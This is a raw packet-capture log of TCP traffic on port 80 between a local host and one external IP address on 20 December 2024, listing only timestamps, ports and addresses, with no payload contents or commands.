Dec 20, 2024 16:32:56.264733076 CET	49853	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:56.264939070 CET	49853	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:56.265078068 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:56.265147924 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:56.384593964 CET	80	49853	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:57.619879007 CET	80	49853	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:57.619973898 CET	49853	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:59.641289949 CET	49853	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:59.641679049 CET	49863	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:59.761380911 CET	80	49863	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:59.761523962 CET	49863	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:59.761771917 CET	49863	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:59.761904955 CET	80	49853	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:59.761964083 CET	49853	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:59.881221056 CET	80	49863	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:01.121773005 CET	80	49863	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:01.121830940 CET	49863	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:03.766251087 CET	49863	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:03.886187077 CET	80	49863	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:03.886444092 CET	49863	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:04.257184029 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:04.376859903 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:04.377149105 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:04.377582073 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:04.497154951 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863347054 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863363981 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863436937 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.863583088 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863595963 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863677979 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.863939047 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863951921 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863964081 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863976955 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.863985062 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.863991022 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.864020109 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.864047050 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.864682913 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.865226030 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.983184099 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.983275890 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.983345032 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.983395100 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.987417936 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.987586021 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:05.987584114 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:05.987627029 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.055685997 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.055839062 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.055918932 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.059840918 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.059901953 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.060314894 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.060498953 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.068217993 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.068284035 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.068516970 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.068576097 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.076754093 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.076916933 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.077048063 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.084920883 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.085282087 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.085299969 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.087445021 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.093343019 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.093426943 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.093651056 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.101723909 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.101953983 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.102056026 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.110105038 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.110121012 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.110383034 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.118688107 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.118717909 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.118767023 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.118767023 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.126889944 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.126935005 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.128274918 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.128343105 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.134284973 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.134387970 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.134426117 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.134464979 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.141675949 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.141760111 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.141766071 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.141848087 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.247539043 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.247628927 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.247631073 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.247685909 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.249726057 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.249768019 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.249984026 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.250032902 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.254276991 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.254328966 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.254678965 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.254784107 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.258882046 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.258969069 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.259953976 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.260047913 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.263339996 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.263402939 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.263439894 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.263694048 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.267987967 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.268045902 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.268306971 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.269113064 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.272454977 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.272634983 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.272676945 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.272676945 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.276921034 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.277036905 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.277087927 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.277087927 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.282147884 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.282172918 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.282257080 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.282257080 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.285938978 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.286021948 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.286061049 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.286061049 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.290361881 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.290473938 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.290708065 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.290708065 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.294898987 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.294956923 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.295015097 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.295339108 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.299381971 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.299485922 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.299530983 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.299530983 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.303968906 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.304033041 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.304094076 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.304644108 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.308516979 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.308677912 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.308991909 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.309148073 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.312932968 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.313026905 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.313085079 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.313211918 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.317358971 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.317500114 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.317557096 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.317661047 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.321856022 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.321912050 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.322457075 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.322573900 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.326391935 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.326455116 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.326632023 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.326864004 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.330857992 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.330936909 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.331038952 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.331372976 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.335391998 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.335510969 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.335678101 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.335778952 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.339926004 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.340183020 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.340447903 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.340572119 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.344352007 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.344417095 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.344492912 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.344537020 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.348850012 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.348905087 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.349499941 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.349612951 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.439882040 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.439977884 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.440186024 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.440243006 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.441668987 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.441746950 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.442220926 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.442276955 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.442359924 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.442543030 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.446047068 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.446113110 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.446405888 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.446541071 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.449498892 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.449623108 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.449956894 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.450006008 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.453177929 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.453445911 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.453535080 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.453809023 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.456717014 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.456785917 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.457489014 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.457550049 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.460081100 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.460150003 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.460484028 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.460546017 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.463493109 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.463555098 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.463753939 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.463816881 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.466692924 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.466748953 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.467086077 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.467135906 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.470001936 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.470016003 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.470055103 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.470098019 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.472964048 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.473066092 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.473117113 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.476068974 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.476284027 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.476569891 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.476636887 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.479167938 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.479207993 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.479367018 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.479448080 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.482296944 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.482450962 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.482526064 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.485217094 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.485317945 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.485373020 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.485424042 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.488198042 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.488276958 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.488440990 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.488591909 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.491542101 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.491554976 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.491583109 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.491599083 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.494330883 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.494343996 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.494371891 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.494399071 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.497292995 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.497307062 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.497349977 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.497406006 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.502249002 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.502424955 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.502783060 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.502867937 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.503540039 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.503552914 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.503597975 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.506616116 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.506668091 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.506851912 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.506927013 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.509460926 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.509533882 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.509712934 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.509794950 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.528451920 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.528465986 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.528496027 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.528517008 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.528553963 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.528812885 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.528839111 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.528852940 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.528877020 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.528877020 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.528899908 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.529479980 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.529493093 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.529536963 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.530275106 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.530287027 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.530322075 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.530324936 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.530575991 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.531856060 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.531933069 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.532082081 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.532136917 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.532202005 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.534120083 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.534132957 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.534225941 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.536942005 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.536961079 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.537018061 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.537018061 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.539808035 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.539865971 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.540020943 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.540210962 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.542778015 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.542879105 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.543028116 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.543294907 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.545810938 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.545857906 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.546027899 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.546087980 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.549108028 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.549169064 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.549242020 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.549295902 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.552010059 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.552110910 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.552148104 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.552148104 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.555032015 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.555084944 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.555355072 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.555452108 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.558202028 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.558260918 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.558321953 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.558361053 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.560935020 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.561161995 CET	49875	80	192.168.2.6	185.156.73.23
